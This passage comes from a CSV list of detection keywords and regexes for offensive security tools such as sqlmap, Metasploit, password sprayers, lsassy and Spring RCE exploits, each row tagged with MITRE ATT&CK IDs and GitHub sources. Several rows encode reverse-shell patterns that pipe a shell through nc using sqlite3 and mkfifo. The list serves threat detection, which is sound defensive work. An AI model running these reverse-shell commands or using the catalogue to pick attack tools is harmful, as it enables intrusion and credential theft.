T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD\Spray-AD*",".{0,1000}Spray\-AD\\Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*sprayhound -*",".{0,1000}sprayhound\s\-.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*sprayhound -d *",".{0,1000}sprayhound\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sprayhound-master.zip*",".{0,1000}sprayhound\-master\.zip.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*Spraying empty passwords*",".{0,1000}Spraying\sempty\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying usernames as passwords*",".{0,1000}Spraying\susernames\sas\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying\*-AccountAsPassword-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-AccountAsPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying\*-Password-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-Password\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SprayingToolkit.git*",".{0,1000}SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master*",".{0,1000}SprayingToolkit\-master.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master.zip*",".{0,1000}SprayingToolkit\-master\.zip.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spraykatz*",".{0,1000}spraykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","740","123","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" "*Spray-Passwords.ps1*",".{0,1000}Spray\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*spring_framework_malicious_jar*",".{0,1000}spring_framework_malicious_jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Spring-cloud-function-SpEL-RCE*",".{0,1000}Spring\-cloud\-function\-SpEL\-RCE.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*spring-core-rce*ROOT.war*",".{0,1000}spring\-core\-rce.{0,1000}ROOT\.war.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*springFramework_CVE-2022-22965_RCE.py*",".{0,1000}springFramework_CVE\-2022\-22965_RCE\.py.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*spyonweb-get-rootdomains *",".{0,1000}spyonweb\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SQ17H1N6(*",".{0,1000}SQ17H1N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*sql_persister.py*",".{0,1000}sql_persister\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*SqlClrPayload*",".{0,1000}SqlClrPayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sqldumper.py*",".{0,1000}sqldumper\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*sqli_common_shared.rb*",".{0,1000}sqli_common_shared\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Sqli-lab*",".{0,1000}Sqli\-lab.{0,1000}","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4984","1492","2023-12-11T17:06:16Z","2012-05-19T19:41:26Z" "*SQL-Injection-Auth-Bypass-Payloads.*",".{0,1000}SQL\-Injection\-Auth\-Bypass\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*SQL-Injection-Libraries*",".{0,1000}SQL\-Injection\-Libraries.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SQL-Injection-Payloads.*",".{0,1000}SQL\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*SQLiPy.py*",".{0,1000}SQLiPy\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*SQLiScanner*",".{0,1000}SQLiScanner.{0,1000}","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","776","283","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" "*sqlite:///ares.db*",".{0,1000}sqlite\:\/\/\/ares\.db.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/sh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/sh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""cmd"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""cmd\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""powershell"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""powershell\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""pwsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""pwsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""zsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""zsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|sh -i*|nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|sh\s\-i.{0,1000}\|nc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlmap -*",".{0,1000}sqlmap\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap --forms --batch -u *",".{0,1000}sqlmap\s\-\-forms\s\-\-batch\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sqlmap.conf*",".{0,1000}sqlmap\.conf.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap.py*",".{0,1000}sqlmap\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap.rb*",".{0,1000}sqlmap\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sqlmap/data/txt/wordlist.txt*",".{0,1000}sqlmap\/data\/txt\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sqlmap4burp*.jar*",".{0,1000}sqlmap4burp.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*sqlmapapi -*",".{0,1000}sqlmapapi\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmapapi.py",".{0,1000}sqlmapapi\.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmapapi.py*",".{0,1000}sqlmapapi\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*sqlmapproject/sqlmap*",".{0,1000}sqlmapproject\/sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmapproject/sqlmap/issues/2442*",".{0,1000}sqlmapproject\/sqlmap\/issues\/2442.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*SQLmate*",".{0,1000}SQLmate.{0,1000}","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","5","408","117","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" "*sqlninja*",".{0,1000}sqlninja.{0,1000}","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SQLRecon.exe*",".{0,1000}SQLRecon\.exe.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*SQLRecon.git*",".{0,1000}SQLRecon\.git.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*SQLServer_Accessible_PotentialSensitiveData.txt*",".{0,1000}SQLServer_Accessible_PotentialSensitiveData\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SQLServer_DefaultLogin.txt*",".{0,1000}SQLServer_DefaultLogin\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*src/cracker.*",".{0,1000}src\/cracker\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/genmkvpwd.*",".{0,1000}src\/genmkvpwd\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/john.asm*",".{0,1000}src\/john\.asm.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 